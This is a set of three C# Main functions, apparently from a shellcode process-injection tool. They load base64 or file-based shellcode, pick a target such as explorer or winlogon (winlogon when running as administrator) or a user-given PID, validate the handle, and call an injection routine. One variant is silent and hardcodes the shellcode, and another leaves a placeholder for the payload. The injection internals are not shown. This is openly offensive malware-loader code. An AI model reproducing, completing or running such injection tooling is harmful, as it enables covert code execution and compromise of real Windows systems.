static void Main(string[] args) { //BerlinDefence.PrintBanner(); try { String b64ShellCode = Shellcode.b64ShellCode; Int32 Proc = BerlinDefence.FindExplorerPID(); BerlinDefence.PROC_VALIDATION pv = BerlinDefence.ValidateProc(Proc); if (!pv.isvalid || pv.hProc == IntPtr.Zero) { return; } else { if (pv.isWow64) { return; } CastleKingside(b64ShellCode, pv, Proc); } } catch { BerlinDefence.GetHelp(); } }
static void Main(string[] args) { Boolean Clean = false; String B64 = @"REPLACETHISWITHSHELLCODE"; try{ Int32 Proc = (args.Length == 0) ? (IsAdministrator() ? Process.GetProcessesByName("winlogon")[0].Id : FindProcId("explorer")) : Int32.Parse(args[0]); BerlinDefence.PROC_VALIDATION pv = BerlinDefence.ValidateProc(Proc); if (!pv.isvalid || pv.hProc == IntPtr.Zero) { if (!pv.isvalid) { Console.WriteLine("[!] Invalid PID specified"); } else { Console.WriteLine("[!] Unable to aquire process handle"); } return; } else { Console.WriteLine("|--------"); Console.WriteLine("| Process : " + pv.sName); Console.WriteLine("| Handle : " + pv.hProc); Console.WriteLine("| Is x32 : " + pv.isWow64); Console.WriteLine("|--------"); if (pv.isWow64) { Console.WriteLine("\n[!] Injection is only supported for 64-bit processes.."); return; } CastleKingside(B64, pv, Proc, Clean); } }catch {} }
static void Main(string[] args) { BerlinDefence.PrintBanner(); if (args.Length == 0) { BerlinDefence.GetHelp(); } else { int iPathScBin = Array.FindIndex(args, s => new Regex(@"(?i)(-|--|/)(p|Path)$").Match(s).Success); int iPID = Array.FindIndex(args, s => new Regex(@"(?i)(-|--|/)(i|Inject)$").Match(s).Success); int bClean = Array.FindIndex(args, s => new Regex(@"(?i)(-|--|/)(c|Clean)$").Match(s).Success); if (iPathScBin != -1 && iPID != -1) { Boolean Clean = false; if (bClean != -1) { Clean = true; } try { String sPathScBin = args[(iPathScBin + 1)]; Int32 Proc = int.Parse(args[(iPID + 1)]); Boolean bFilePath = BerlinDefence.PathIsFile(sPathScBin); BerlinDefence.PROC_VALIDATION pv = BerlinDefence.ValidateProc(Proc); if (!bFilePath || !pv.isvalid || pv.hProc == IntPtr.Zero) { if (!pv.isvalid) { Console.WriteLine("[!] Invalid PID specified (-i|--Inject).."); } else { Console.WriteLine("[!] Unable to aquire process handle (-i|--Inject).."); } return; } else { Console.WriteLine("|--------"); Console.WriteLine("| Process : " + pv.sName); Console.WriteLine("| Handle : " + pv.hProc); Console.WriteLine("| Is x32 : " + pv.isWow64); Console.WriteLine("| Sc binpath : " + sPathScBin); Console.WriteLine("|--------"); if (pv.isWow64) { Console.WriteLine("\n[!] Injection is only supported for 64-bit processes.."); return; } CastleKingside(sPathScBin, pv, Proc, Clean); } } catch { BerlinDefence.GetHelp(); } } else { BerlinDefence.GetHelp(); } } }